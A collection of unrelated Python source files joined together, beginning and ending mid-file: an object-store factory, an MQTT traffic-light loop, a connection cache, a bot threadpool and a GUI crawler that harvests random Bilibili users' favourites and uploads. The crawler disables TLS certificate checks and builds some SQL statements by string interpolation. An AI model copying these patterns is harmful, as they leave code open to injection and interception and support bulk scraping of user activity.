        kwds["fsmon"] = fsmon
    elif store == 'irods':
        from .rods import IRODSObjectStore
        cls = IRODSObjectStore
    elif store == 'azure_blob':
        from .azure_blob import AzureBlobObjectStore
        cls = AzureBlobObjectStore
    elif store == 'pithos':
        from .pithos import PithosObjectStore
        cls = PithosObjectStore
    # Disable the Pulsar object store for now until it receives some attention
    # elif store == 'pulsar':
    #     from .pulsar import PulsarObjectStore
    #     return PulsarObjectStore(config=config, config_xml=config_xml)
    return cls, kwds
def build_object_store_from_config(config, fsmon=False, config_xml=None, config_dict=None):
    """
    Invoke the appropriate object store.

    Will use the `object_store_config_file` attribute of the `config` object to
    configure a new object store from the specified XML or YAML file.
    Or you can specify the object store type in the `object_store` attribute of
    the `config` object. Currently 'disk', 's3', 'swift', 'distributed',
    'hierarchical', 'irods', and 'pulsar' are supported values.
    """
    # Tracks which construction path to use below: 'xml' -> from_xml(),
    # 'dict' -> the class constructor with config_dict.
    from_object = 'xml'
    if config is None and config_dict is not None and 'config' in config_dict:
        # Build a config object from to_dict of an ObjectStore.
        config = Bunch(**config_dict["config"])
    elif config is None:
        raise Exception("build_object_store_from_config sent None as config parameter and one cannot be recovered from config_dict")
    if config_xml is None and config_dict is None:
        # Top-level invocation: discover configuration from the config file.
        config_file = config.object_store_config_file
        if os.path.exists(config_file):
            if config_file.endswith(".xml") or config_file.endswith(".xml.sample"):
                # This is a top level invocation of build_object_store_from_config, and
                # we have an object_store_conf.xml -- read the .xml and build
                # accordingly
                config_xml = ElementTree.parse(config.object_store_config_file).getroot()
                store = config_xml.get('type')
            else:
                # Non-XML config files are treated as YAML.
                with open(config_file, "rt") as f:
                    config_dict = yaml.safe_load(f)
                from_object = 'dict'
                store = config_dict.get('type')
        else:
            # No config file - fall back to the simple object_store setting.
            store = config.object_store
    elif config_xml is not None:
        store = config_xml.get('type')
    elif config_dict is not None:
        from_object = 'dict'
        store = config_dict.get('type')
    objectstore_class, objectstore_constructor_kwds = type_to_object_store_class(store, fsmon=fsmon)
    if objectstore_class is None:
        # NOTE(review): only logs - the calls below will then raise
        # AttributeError/TypeError on None; an explicit raise may be clearer.
        log.error("Unrecognized object store definition: {0}".format(store))
    if from_object == 'xml':
        return objectstore_class.from_xml(config=config, config_xml=config_xml, **objectstore_constructor_kwds)
    else:
        return objectstore_class(config=config, config_dict=config_dict, **objectstore_constructor_kwds)
def local_extra_dirs(func):
    """Non-local plugin decorator using local directories for the extra_dirs (job_work and temp).

    When the call carries a non-None ``base_dir`` keyword, the call is
    delegated to the ``DiskObjectStore`` implementation of the same method
    found in the plugin's MRO; otherwise the wrapped (non-local)
    implementation runs.
    """
    import functools

    # functools.wraps preserves the wrapped method's __name__/__doc__;
    # the previous wrapper (confusingly itself named ``wraps``) did not,
    # which broke introspection of decorated plugin methods.
    @functools.wraps(func)
    def wrapper(self, *args, **kwargs):
        if kwargs.get('base_dir', None) is None:
            # No local directory requested - use the plugin's own method.
            return func(self, *args, **kwargs)
        else:
            # Delegate to DiskObjectStore's implementation (looked up by
            # name so plugins only need it somewhere in their MRO).
            for c in self.__class__.__mro__:
                if c.__name__ == 'DiskObjectStore':
                    return getattr(c, func.__name__)(self, *args, **kwargs)
            raise Exception("Could not call DiskObjectStore's %s method, does your "
                            "Object Store plugin inherit from DiskObjectStore?"
                            % func.__name__)
    return wrapper
def convert_bytes(bytes):
    """A helper function used for pretty printing disk usage."""
    # None is treated as zero; everything is normalized to float first.
    amount = float(bytes if bytes is not None else 0)
    thresholds = (
        (1099511627776, 'TB'),
        (1073741824, 'GB'),
        (1048576, 'MB'),
        (1024, 'KB'),
    )
    for threshold, suffix in thresholds:
        if amount >= threshold:
            return '%.2f%s' % (amount / threshold, suffix)
    # Below 1 KB the historical unit label is a lowercase 'b'.
    return '%.2fb' % amount
def config_to_dict(config):
    """Dict-ify the portion of a config object consumed by the ObjectStore class and its subclasses.
    """
    consumed_attributes = (
        'object_store_check_old_style',
        'file_path',
        'umask',
        'jobs_directory',
        'new_file_path',
        'object_store_cache_path',
        'gid',
    )
    return {name: getattr(config, name) for name in consumed_attributes}
def _create_object_in_session(obj):
    """Add *obj* to its SQLAlchemy session and flush, raising without one."""
    # object_session may itself be None when the ORM layer wasn't importable.
    session = object_session(obj) if object_session is not None else None
    if session is not None:
        object_session(obj).add(obj)
        object_session(obj).flush()
    else:
        raise Exception(NO_SESSION_ERROR_MESSAGE)
class ObjectStorePopulator(object):
    """ Small helper for interacting with the object store and making sure all
    datasets from a job end up with the same object_store_id.
    """

    def __init__(self, app):
        self.object_store = app.object_store
        # Recorded after the first dataset is created; reused for the rest.
        self.object_store_id = None

    def set_object_store_id(self, data):
        # Create an empty file immediately.  The first dataset is created in
        # the "default" store; every later dataset reuses the id recorded
        # from that first creation so the whole job stays in one store.
        dataset = data.dataset
        dataset.object_store_id = self.object_store_id
        try:
            self.object_store.create(dataset)
        except ObjectInvalid:
            raise Exception('Unable to create output dataset: object store is full')
        # After the first output this is a no-op - the ids already match.
        self.object_store_id = dataset.object_store_id
|
main.py | from subscribe import subscribe
from publish import publish
from time import sleep
import threading
from trafficlight import blink_red, blink_green, blink_amber
# MQTT broker and topic shared by the subscriber thread and the publisher.
broker = "test.mosquitto.org"
topic = "trafficlight/bradford"
try:
    # subscribe to the topic on a background thread; the loop below runs
    # for as long as that subscriber stays alive
    thr = threading.Thread(target=subscribe, args=(broker, topic))
    thr.start()
    while thr.is_alive():
        # publish traffic data to the broker on the topic
        publish(broker, topic, "{light: amber, signal: OFF, duration: 0}")
        publish(broker, topic, "{light: red, signal: ON, duration: 5}")
        sleep(1)  # Add a second delay before the traffic light change to ensure the user has gotten the message
        blink_red()  # Change traffic light to Red for 5 seconds
        publish(broker, topic, "{light: red, signal: OFF, duration: 0}")
        publish(broker, topic, "{light: amber, signal: ON, duration: 2}")
        sleep(1)  # Add a second delay before the traffic light change to ensure the user has gotten the message
        blink_amber()  # Change traffic light to Amber for 2 seconds
        publish(broker, topic, "{light: amber, signal: OFF, duration: 0}")
        publish(broker, topic, "{light: green, signal: ON, duration: 10}")
        sleep(1)  # Add a second delay before the traffic light change to ensure the user has gotten the message
        blink_green()  # Change Traffic light to Green for 10 seconds
except KeyboardInterrupt:
    # Ctrl-C ends the light cycle cleanly.
    pass
|
connect_manager.py | import os
import sys
import socket
import operator
import time
import threading
import struct
# When run directly (not imported as part of the package), extend sys.path
# so the bundled pure-Python libraries can be imported.
if __name__ == '__main__':
    current_path = os.path.dirname(os.path.abspath(__file__))
    root_path = os.path.abspath(os.path.join(current_path, os.pardir))
    python_path = os.path.join(root_path, 'python27', '1.0')
    noarch_lib = os.path.join(python_path, 'lib', 'noarch')
    sys.path.append(noarch_lib)
from socket_wrap import SocketWrap
import simple_queue
import socks
import global_var as g
from xlog import getLogger
# Module-wide logger for the smart_router component.
xlog = getLogger("smart_router")
def load_proxy_config():
    """Install the globally configured upstream proxy into the socks module.

    Raises a bare Exception when the configured proxy type is unknown.
    """
    # NOTE(review): default_socket is declared global but never assigned
    # here - presumably set elsewhere; verify before removing.
    global default_socket
    if g.config.PROXY_ENABLE:
        # Map the configured type string to the socks module constant.
        if g.config.PROXY_TYPE == "HTTP":
            proxy_type = socks.HTTP
        elif g.config.PROXY_TYPE == "SOCKS4":
            proxy_type = socks.SOCKS4
        elif g.config.PROXY_TYPE == "SOCKS5":
            proxy_type = socks.SOCKS5
        else:
            xlog.error("proxy type %s unknown, disable proxy", g.config.PROXY_TYPE)
            raise Exception()
        socks.set_default_proxy(proxy_type, g.config.PROXY_HOST, g.config.PROXY_PORT,
                                g.config.PROXY_USER, g.config.PROXY_PASSWD)
class ConnectManager(object):
    """Keeps a small per-host cache of pre-opened TCP connections.

    A background thread evicts cached connections older than
    ``connection_timeout`` seconds.  ``get_conn`` races several connect
    attempts (one thread per candidate IP) and returns the first winner.
    """

    def __init__(self, connection_timeout=15, connect_threads=3, connect_timeout=5):
        self.lock = threading.Lock()
        self.cache = {}
        # host => [ { "conn":.., "create_time" }
        #           ... ]
        self.connection_timeout = connection_timeout
        self.connect_timeout = connect_timeout
        self.connect_threads = connect_threads
        self.running = True
        # Daemonless reaper loop; stop() flips self.running to end it.
        threading.Thread(target=self.check_thread).start()

    def stop(self):
        # Signal check_thread to exit after its current sleep.
        self.running = False

    def check_thread(self):
        """Once a second, drop cached connections past connection_timeout."""
        while self.running:
            time_now = time.time()
            with self.lock:
                for host_port in list(self.cache.keys()):
                    try:
                        cache = self.cache[host_port]
                        # Iterate over a copy so removal is safe.
                        for cc in list(cache):
                            if time_now - cc["create_time"] > self.connection_timeout:
                                cache.remove(cc)
                                cc["conn"].close()
                    except:
                        # Best-effort eviction; ignore races with consumers.
                        pass
            time.sleep(1)

    def add_sock(self, host_port, sock):
        """Park an open connection under its "host:port" key."""
        with self.lock:
            if host_port not in self.cache:
                self.cache[host_port] = []
            self.cache[host_port].append({"create_time": time.time(), "conn": sock})

    def get_sock_from_cache(self, host_port):
        """Pop the oldest still-fresh cached connection, or None."""
        time_now = time.time()
        with self.lock:
            if host_port in self.cache:
                cache = self.cache[host_port]
                while len(cache):
                    try:
                        cc = cache.pop(0)
                        if time_now - cc["create_time"] > self.connection_timeout:
                            # Too old - close and keep looking.
                            cc["conn"].close()
                            continue
                        return cc["conn"]
                    except Exception as e:
                        xlog.exception("get_conn:%r", e)
                        break

    def create_connect(self, queue, host, ip, port, timeout=5):
        """Worker: open one connection to ip:port, cache it, report via queue."""
        if int(g.config.PROXY_ENABLE):
            sock = socks.socksocket(socket.AF_INET if ':' not in ip else socket.AF_INET6)
        else:
            sock = socket.socket(socket.AF_INET if ':' not in ip else socket.AF_INET6)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # set struct linger{l_onoff=1,l_linger=0} to avoid 10048 socket error
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
        # resize socket recv buffer 8K->32K to improve browser related application performance
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 32 * 1024)
        sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, True)
        sock.settimeout(timeout)
        start_time = time.time()
        try:
            sock.connect((ip, port))
            time_cost = (time.time() - start_time) * 1000
            # xlog.debug("connect %s %s:%d time:%d", host, ip, port, time_cost)
            g.ip_cache.update_connect_time(ip, port, time_cost)
            s = SocketWrap(sock, ip, port, host)
            host_port = "%s:%d" % (host, port)
            self.add_sock(host_port, s)
            queue.put(True)
        except Exception as e:
            # xlog.debug("connect %s %s:%d fail:%r", host, ip, port, e)
            g.ip_cache.report_connect_fail(ip, port)
            queue.put(False)

    def get_conn(self, host, ips, port, timeout=5):
        """Return a connection to host, racing the fastest-ranked IPs.

        ``ips`` entries look like "ip|meta"; IPs with a recorded connect
        time >= 8000ms are skipped.  Returns None when no usable IP exists
        (and possibly when every attempt times out).
        """
        # xlog.debug("connect to %s:%d %r", host, port, ips)
        end_time = time.time() + timeout
        host_port = "%s:%d" % (host, port)
        # Fast path: reuse a cached connection.
        sock = self.get_sock_from_cache(host_port)
        if sock:
            return sock
        # Rank candidate IPs by their historical connect time.
        ip_rate = {}
        for ipd in ips:
            ipl = ipd.split("|")
            ip = ipl[0]
            connect_time = g.ip_cache.get_connect_time(ip, port)
            if connect_time >= 8000:
                continue
            ip_rate[ip] = connect_time
        if not ip_rate:
            return None
        ip_time = sorted(ip_rate.items(), key=operator.itemgetter(1))
        ordered_ips = [ip for ip, rate in ip_time]
        wait_queue = simple_queue.Queue()
        # Launch one connect attempt at a time, waiting a growing slice
        # before starting the next candidate.
        wait_t = 0.2
        for ip in ordered_ips:
            threading.Thread(target=self.create_connect, args=(wait_queue, host, ip, port)).start()
            status = wait_queue.get(wait_t)
            if status:
                sock = self.get_sock_from_cache(host_port)
                if sock:
                    return sock
            else:
                time.sleep(wait_t)
            wait_t += 0.1
        # All attempts launched - drain results until the deadline.
        while True:
            time_left = end_time - time.time()
            if time_left <= 0:
                return self.get_sock_from_cache(host_port)
            status = wait_queue.get(time_left)
            if status:
                sock = self.get_sock_from_cache(host_port)
                if sock:
                    return sock
threadpool.py | import asyncio
import logging
import threading
import time
from queue import Queue
from mmpy_bot.scheduler import default_scheduler
from mmpy_bot.webhook_server import WebHookServer
log = logging.getLogger("mmpy.threadpool")
class ThreadPool(object):
    def __init__(self, num_workers: int):
        """Threadpool class to easily specify a number of worker threads and assign work
        to any of them.

        Arguments:
        - num_workers: int, how many threads to run simultaneously.
        """
        self.num_workers = num_workers
        # Workers only run while this flag is True; see stop().
        self.alive = False
        self._queue = Queue()
        # One token per worker currently executing a task.
        self._busy_workers = Queue()
        self._threads = []

    def add_task(self, function, *args):
        """Queue ``function(*args)`` for execution by any free worker."""
        self._queue.put((function, args))

    def get_busy_workers(self):
        """Return how many workers are currently executing a task."""
        return self._busy_workers.qsize()

    def start(self):
        """Spawn the worker threads; tasks queued earlier start running now."""
        self.alive = True
        # Spawn num_workers threads that will wait for work to be added to the queue
        for _ in range(self.num_workers):
            worker = threading.Thread(target=self.handle_work)
            self._threads.append(worker)
            worker.start()

    def stop(self):
        """Signals all threads that they should stop and waits for them to finish."""
        self.alive = False
        # Signal every thread that it's time to stop
        for _ in range(self.num_workers):
            # Each worker consumes exactly one no-op task and then sees
            # self.alive is False, ending its loop.
            self._queue.put((self._stop_thread, tuple()))
        # Wait for each of them to finish
        log.info("Stopping threadpool, waiting for threads...")
        for thread in self._threads:
            thread.join()
        log.info("Threadpool stopped.")

    def _stop_thread(self):
        """Used to stop individual threads."""
        return

    def handle_work(self):
        """Worker loop: pull tasks off the queue until the pool dies."""
        while self.alive:
            # Wait for a new task (blocking)
            function, arguments = self._queue.get()
            # Notify the pool that we started working
            self._busy_workers.put(1)
            function(*arguments)
            # Notify the pool that we finished working
            self._queue.task_done()
            self._busy_workers.get()

    def start_scheduler_thread(self, trigger_period: float):
        """Run default_scheduler.run_pending() every trigger_period seconds
        on a pool worker until the pool is stopped."""
        def run_pending():
            log.info("Scheduler thread started.")
            while self.alive:
                time.sleep(trigger_period)
                default_scheduler.run_pending()
            log.info("Scheduler thread stopped.")

        self.add_task(run_pending)

    def start_webhook_server_thread(self, webhook_server: WebHookServer):
        """Run the webhook server inside its own asyncio loop on a worker."""
        async def start_server():
            log.info("Webhook server thread started.")
            await webhook_server.start()
            while self.alive:
                # We just use this to keep the loop running in a non-blocking way
                await asyncio.sleep(0.001)
            await webhook_server.stop()
            log.info("Webhook server thread stopped.")

        # NOTE(review): the coroutine object is created here and only
        # awaited when a worker runs asyncio.run - confirm intentional.
        self.add_task(asyncio.run, start_server())
|
clear.py | # -*- coding: utf-8 -*-
import PySimpleGUI as sg
import time
import asyncio
import sqlite3
import threading
import queue
import logging
import os
import json
import aiohttp
import random
import sys
import xlsxwriter #导入模块
# Crawl-wide mutable state, shared between the GUI thread and the worker.
g_all_num = 0              # count of "active" users found so far
g_related_uid_list = []    # uids whose videos matched one of the target tags
delay = 0.8                # per-request throttle (seconds)
g_total_num = 0            # total uids sampled/attempted
g_stop = False             # set True by the GUI to abort the crawl
threads = []               # worker threads started by the GUI
g_ranking_tags = []        # every tag seen, for later frequency ranking
def save_user(cursor, conn, uid, fav, owned, refav, reowned, t1, t2):
    """Persist one crawled user's video/favourite statistics into ``user``.

    The list arguments are stored as their ``str()`` representation; only
    their lengths and string forms matter to the schema.  Uses DB-API
    parameter substitution instead of the previous f-string SQL, which was
    injectable and broke whenever a value contained a quote character.
    """
    sql = ('insert into user( id,owned_num,fav_num,fav_related_num,owned_related_num,'
           'fav_related_bvids,owned_related_bvids,owned_bvids,fav_bvids,last_owned_time,last_fav_time) '
           'values (?,?,?,?,?,?,?,?,?,?,?)')
    params = (uid, len(owned), len(fav), len(refav), len(reowned),
              str(refav), str(reowned), str(owned), str(fav), t1, t2)
    try:
        cursor.execute(sql, params)
        conn.commit()
    except BaseException as e:
        # Best-effort persistence: log and continue the crawl.
        print(sql)
        logging.error(e)
#单收藏夹视频
async def fetch_sigle_list_favs_bvids(session, mid, pn=1):
    """Fetch the bvids of one favourites folder, paging recursively.

    For the first page (pn == 1) returns ``(fav_time_of_newest, bvids)``;
    recursive pages return just the bvid list.  Stops after 20 pages.
    """
    if g_stop:
        return 0, []
    await asyncio.sleep(delay)  # throttle API requests
    fav_uri = f"https://api.bilibili.com/x/v3/fav/resource/list?media_id={mid}&pn={pn}&ps=20&keyword=&order=mtime&type=0&tid=0&jsonp=jsonp"
    bvids = []
    async with session.get(fav_uri) as response:
        try:
            data = json.loads(await response.text())
            if (data['code'] == 0 and data['data']['medias']):
                videos = data['data']['medias']
                for v in videos:
                    bvids.append(v['bvid'])
                # Last page reached (or 20-page safety cap): stop recursing.
                if pn * 20 >= data['data']['info']['media_count'] or pn > 20:
                    if pn == 1:
                        return videos[0]['fav_time'], bvids
                    return bvids
                res = await fetch_sigle_list_favs_bvids(session, mid, pn + 1)
                if pn == 1:
                    return videos[0]['fav_time'], bvids + res
                return bvids + res
        except BaseException as e:
            # NOTE(review): logging.error is called with extra positional
            # args but no format placeholders - the uri/exception are lost.
            logging.error("uri:", fav_uri, e)
            if pn == 1:
                return 0, []
            return []
    # API returned code != 0 or an empty media list.
    if pn == 1:
        return 0, []
    return []
#收藏视频
async def fetch_favs_bvids(session, uid, maxt):
    """Collect all favourited bvids of a user across all their folders.

    Returns ``(latest_fav_time, bvids)``; ``(0, [])`` on error/stop.
    ``maxt`` caps how many folder fetches run concurrently.
    """
    print('收藏视频')
    if g_stop:
        return 0, []
    await asyncio.sleep(delay)  # throttle API requests
    uri = f"https://api.bilibili.com/x/v3/fav/folder/created/list?pn=1&ps=100&up_mid={uid}&jsonp=jsonp"
    fav_list = []
    async with session.get(uri) as response:
        try:
            data = json.loads( await response.text())
            if (data['code'] == 0 and data['data']):
                for d in data['data']['list']:
                    fav_list.append(d['id'])
            else:
                return 0, []
            tasks_container = [fetch_sigle_list_favs_bvids(session, f) for f in fav_list]
            # Throttle: run at most maxt folder fetches at a time, in case a
            # user has created dozens of favourites folders.
            tasks = []
            bvids = []
            fav_times = []
            for task in tasks_container:
                tasks.append(task)
                if (len(tasks) >= maxt):
                    results = await asyncio.gather(*tasks)
                    for t, bv in results:
                        fav_times.append(t)
                        bvids += bv
                    tasks = []
            # Flush the remaining partial batch.
            results = await asyncio.gather(*tasks)
            for t, bv in results:
                fav_times.append(t)
                bvids += bv
            return max(fav_times), bvids
        except BaseException as e:
            # NOTE(review): logging.error arguments don't match the format
            # string - the uri and exception are effectively dropped.
            logging.error("uri:", uri, e)
            return 0, []
#视频标签
async def fetch_video_by_bvid(session, bvid):
    """Fetch the tag list for a single video.

    Returns ``(bvid, tags)``; ``tags`` is empty on any error or when the
    crawler has been asked to stop.  Tags containing quote characters are
    skipped because callers interpolate tag text into SQL strings.
    """
    if g_stop:
        return bvid, []
    print('视频标签')
    uri = f"https://api.bilibili.com/x/tag/archive/tags?bvid={bvid}&jsonp=jsonp"
    tags = []
    await asyncio.sleep(delay)  # throttle API requests
    async with session.get(uri) as response:
        try:
            data = json.loads(await response.text())
            if data['code'] == 0:
                for d in data['data']:
                    if '\'' not in d['tag_name'] and '\"' not in d['tag_name']:
                        tags.append(d['tag_name'])
            else:
                # BUG FIX: this branch previously referenced the undefined
                # name ``e`` (NameError swallowed by the except below); log
                # the API error code instead.
                logging.error("uri: %s api code: %s", uri, data['code'])
        except BaseException as e:
            # Use %-style placeholders; the old call passed the URI and
            # exception as logging args with no placeholders in the message.
            logging.error("uri: %s error: %r", uri, e)
    return bvid, tags
#拥有视频
async def fetch_owned_bvids(session, uid, pn=1):
    """Fetch bvids of videos uploaded by a user, paging recursively.

    For the first page (pn == 1) returns ``(created_time_of_newest, bvids)``;
    recursive pages return just the bvid list.  Stops after 10 pages.
    """
    print('拥有视频')
    await asyncio.sleep(delay)  # throttle API requests
    uri = f"https://api.bilibili.com/x/space/arc/search?pn={pn}&ps=100&order=pubdate&keyword=&mid={uid}"
    bvids = []
    if g_stop:
        return 0, []
    async with session.get(uri) as response:
        try:
            data = json.loads(await response.text())
            if (data['code'] == 0 and data['data']['list']['vlist']):
                videos = data['data']['list']['vlist']
                for v in videos:
                    bvids.append(v['bvid'])
                # Last page reached (or 10-page safety cap): stop recursing.
                if (pn * 100 >= data['data']['page']['count'] or pn > 10):
                    if pn == 1:
                        return videos[0]['created'], bvids
                    return bvids
                res = await fetch_owned_bvids(session, uid, pn + 1)
                if pn == 1:
                    return videos[0]['created'], bvids + res
                return bvids + res
        except BaseException as e:
            # NOTE(review): logging.error arguments don't match the format
            # string - the uri and exception are effectively dropped.
            logging.error("uri:", uri, e)
            if pn == 1:
                return 0, []
            return []
    # API returned code != 0 or an empty video list.
    if pn == 1:
        return 0, []
    return []
#所有视频
async def fetch_user_favs_and_bvids(uid, maxt, tags_need):
    """Crawl one user: uploads + favourites, tag each video, store results.

    Updates the module-level counters/lists and writes the user plus every
    seen video into the sqlite cache.  ``maxt`` caps concurrent tag fetches;
    ``tags_need`` is the list of target tags that mark a user "related".
    """
    global g_related_uid_list
    global g_all_num
    global g_ranking_tags
    print('所有视频')
    try:
        async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:
            # Newest upload time plus every uploaded bvid.
            res2 = await asyncio.gather(fetch_owned_bvids(session, uid))
            last_owned_time, owned_bvids = res2[0]
            # Newest favourite time plus every favourited bvid.
            res1 = await asyncio.gather(fetch_favs_bvids(session, uid, maxt))
            last_fav_time, fav_bvids = res1[0]
        if last_owned_time == 0 and last_fav_time == 0:
            # Inactive/empty account - not counted as an active user.
            return
        g_all_num += 1
        # Fetch tags for uploaded videos, batching maxt requests at a time.
        tasks = []
        owned_related = []
        owned = []
        try:
            async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:
                for bvid in owned_bvids:
                    tasks.append(fetch_video_by_bvid(session, bvid))
                    tagsList = []
                    if (len(tasks) >= maxt):
                        tagsList = await asyncio.gather(*tasks)
                        tasks = []
                        for bvid, tags in tagsList:
                            owned.append((bvid, tags))
                            for tn in tags_need:
                                if tn in tags:
                                    owned_related.append((bvid, tags))
                # Flush the remaining partial batch.
                tagsList = await asyncio.gather(*tasks)
                tasks = []
                for bvid, tags in tagsList:
                    owned.append((bvid, tags))
                    for tn in tags_need:
                        if tn in tags:
                            owned_related.append((bvid, tags))
        except BaseException as e:
            logging.error("获取owned标签错误", e)
        # Fetch tags for favourited videos, same batching scheme.
        tasks = []
        fav_related = []
        fav = []
        try:
            async with aiohttp.ClientSession(connector=aiohttp.TCPConnector(verify_ssl=False)) as session:
                for bvid in fav_bvids:
                    tasks.append(fetch_video_by_bvid(session, bvid))
                    tagsList = []
                    if (len(tasks) >= maxt):
                        tagsList = await asyncio.gather(*tasks)
                        tasks = []
                        for bvid, tags in tagsList:
                            fav.append((bvid, tags))
                            for tn in tags_need:
                                if tn in tags:
                                    fav_related.append((bvid, tags))
                # Flush the remaining partial batch.
                tagsList = await asyncio.gather(*tasks)
                tasks = []
                for bvid, tags in tagsList:
                    fav.append((bvid, tags))
                    for tn in tags_need:
                        if tn in tags:
                            fav_related.append((bvid, tags))
        except BaseException as e:
            logging.error("获取fav标签错误", e)
        # Any tag hit makes this a "related" (target) user.
        if len(fav_related) > 0 or len(owned_related) > 0:
            g_related_uid_list.append(uid)
        conn = sqlite3.connect(os.path.dirname(__file__) + '/cache.db')
        cursor = conn.cursor()
        save_user(cursor, conn, uid, [x for x, y in fav], [x for x, y in owned], [x for x, y in fav_related], [x for x, y in owned_related], last_owned_time, last_fav_time)
        print(len(fav), len(owned))
        # Record every seen video and accumulate tags for later ranking.
        for x, y in fav:
            g_ranking_tags += y
            cursor.execute(f'insert into video(bvid,tags) values (\"{x}\",\"{y}\")')
        for x, y in owned:
            g_ranking_tags += y
            cursor.execute(f'insert into video(bvid,tags) values (\"{x}\",\"{y}\")')
        conn.commit()
    except BaseException as e:
        print(e)
#用户分离函数
async def user_go(utype, maxu, maxt, tags_need):
    """Sample random uids and crawl each until the target count is reached.

    ``utype`` 0 counts active users (g_all_num) toward ``maxu``;
    ``utype`` 1 counts matched/related users instead.
    """
    print('用户分离函数')
    global g_total_num
    while (g_all_num < maxu and utype == 0) or (len(g_related_uid_list) < maxu and utype == 1):
        tasks = []
        uid_list = []
        # if random.randint(1,10) < 7 :
        #     print('<<<<<<<<<')
        #     uid_list =random.sample(range(1,50_0000), 100)
        # else:
        uid_list = random.sample(range(1, 4_0000_0000), 100)
        # uid_list = [50911853]
        for uid in uid_list:
            if uid not in g_related_uid_list:
                # Re-check the stop/target conditions before each new crawl.
                if (g_all_num >= maxu and utype == 0) or (len(g_related_uid_list) >= maxu and utype == 1) or g_stop:
                    return
                tasks.append(fetch_user_favs_and_bvids(uid, maxt, tags_need))
                g_total_num += 1
                # Run at most maxt user crawls concurrently.
                if (len(tasks) >= maxt):
                    await asyncio.gather(*tasks)
                    tasks = []
        # Flush the remaining partial batch for this sample.
        await asyncio.gather(*tasks)
#用户信息业务主线程
def user_info_thread(maxt, maxu, utype, tags_need):
    """Worker-thread entry point: run the user crawl on a private event loop."""
    print('用户信息业务主线程')
    # Each worker thread needs its own asyncio loop.
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    crawl_task = asyncio.ensure_future(user_go(utype, maxu, maxt, tags_need))
    loop.run_until_complete(crawl_task)
    loop.close()
def main():
    """GUI entry point: build the cache db, show the window, drive the crawl."""
    global g_stop
    # Always start from a fresh cache database.
    if (os.path.exists(os.path.dirname(__file__) + '/cache.db')):
        os.remove(os.path.dirname(__file__) + '/cache.db')
    try:
        conn = sqlite3.connect(os.path.dirname(__file__) + '/cache.db')
        cursor = conn.cursor()
        cursor.execute('create table user (id integer primary key, owned_num integer, fav_num integer, \
fav_related_num integer, owned_related_num integer,fav_related_bvids text,owned_related_bvids text,\
owned_bvids text, fav_bvids text,last_owned_time integer,last_fav_time integer)')
        cursor.execute('create table video (bvid text,tags text)')
    except BaseException as e:
        logging.warning(e)  # schema may already exist - warn and continue
    conn.close()
    # Build the PySimpleGUI layout.
    sg.ChangeLookAndFeel('Topanga')
    base_layout = [[sg.OptionMenu(('活跃用户', '目标用户'), size=(7, 1), key='utype'), sg.Input(size=(8, 1), default_text=100, key='maxu')],
                   [sg.Text('线程:', size=(10, 1)), sg.Input(size=(8, 1), default_text=10, key='maxt')]]
    tag_layout = [[sg.MLine(default_text='英雄联盟\nLOL', enable_events=True, key=('tags'), size=(44, 5), tooltip='标签不支持单引号和双引号')]]
    proxy_layout = [[sg.Text('没写', justification='center', size=(18, 1))],
                    [sg.Text(' ', justification='center', size=(18, 1))]]
    layout = [
        [sg.Frame('基本设置', base_layout, key='bf'), sg.Frame('代理设置 (总数:0)', proxy_layout, key='pf')],
        [sg.Frame('标签设置 (一行一个标签,当前共2个)', tag_layout, key='tt')],
        [sg.Text('用户进度\t(0/100)\t0% 活跃用户数:0', size=(42, 1), key='upbt')],
        [sg.ProgressBar(100, orientation='h', size=(42, 20), key='upb')],
        [sg.Button('<( ̄︶ ̄)↗[GO!]', key='go'), sg.Text('\t耗时:', size=(28, 1), key='cost')]
    ]
    w = sg.Window('BiliBili 爬虫', keep_on_top=True, alpha_channel=.9, disable_close=False).Layout(layout)
    # Event loop: window close, "go" button, or tag-box edits.
    while True:
        e, v = w.Read()
        if e == None:
            # Window closed - signal the crawl thread to stop.
            g_stop = True
            break
        elif e == 'go':
            start = time.time()
            w['go'].Update(disabled=True)
            # NOTE(review): the comprehension variable shadows the event
            # values dict ``v`` - works, but fragile.
            tags_need = [v for v in v['tags'].split('\n') if v]
            utype = 0 if v['utype'] == '活跃用户' else 1
            maxt = int(v['maxt'])
            maxu = int(v['maxu'])
            thread_user_info = threading.Thread(target=user_info_thread, args=(maxt, maxu, utype, tags_need,), daemon=True)
            thread_user_info.start()
            threads.append(thread_user_info)
            # Poll progress twice a second until the crawl thread exits.
            while thread_user_info.is_alive():
                progress = g_all_num if utype == 0 else len(g_related_uid_list)
                w['upbt'].Update(f'用户进度\t({progress}/{maxu})\t {round(progress*100/maxu)}% 活跃用户数:{g_all_num}')
                w['upb'].UpdateBar(progress, maxu)
                w['cost'].Update('总数:{}\t耗时:{}秒'.format(g_total_num, round(time.time() - start)))
                time.sleep(0.5)
            # One final refresh after the thread finished.
            progress = g_all_num if utype == 0 else len(g_related_uid_list)
            w['upbt'].Update(f'用户进度\t({progress}/{maxu})\t {round(progress*100/maxu)}% 活跃用户数:{g_all_num}')
            w['upb'].UpdateBar(progress, maxu)
            w['cost'].Update('总数:{}\t耗时:{}秒'.format(g_total_num, round(time.time() - start)))
            time.sleep(0.5)
            w['go'].Update('导出数据中.....')
            time.sleep(0.5)
            # Export the sqlite cache to an .xls workbook.
            db2_xls_main_go()
            w['go'].Update('<( ̄︶ ̄)↗[GO!]')
            w['go'].Update(disabled=False)
        elif e == 'tags':
            # Live-update the tag counter in the frame title.
            tags_need = [v for v in v['tags'].split('\n') if v]
            w['tt'].Update('标签设置 (一行一个标签,当前共{}个)'.format(len(tags_need)))
    w.close()
def sqlite_get_col_names(cur, table):
    """Return the column names of *table*.

    Runs a throwaway SELECT so cursor.description is populated.  The loop
    variable no longer shadows the ``tuple`` builtin.  NOTE: *table* is
    interpolated into the SQL - only pass trusted table names.
    """
    query = 'select * from %s' % table
    cur.execute(query)
    return [description[0] for description in cur.description]
def sqlite_query(cur, table, col='*', where=''):
    """SELECT *col* from *table*, optionally filtered by *where*; return all rows.

    NOTE: arguments are interpolated into the SQL - trusted input only.
    """
    base = 'select %s from %s' % (col, table)
    if where != '':
        query = '%s where %s' % (base, where)
    else:
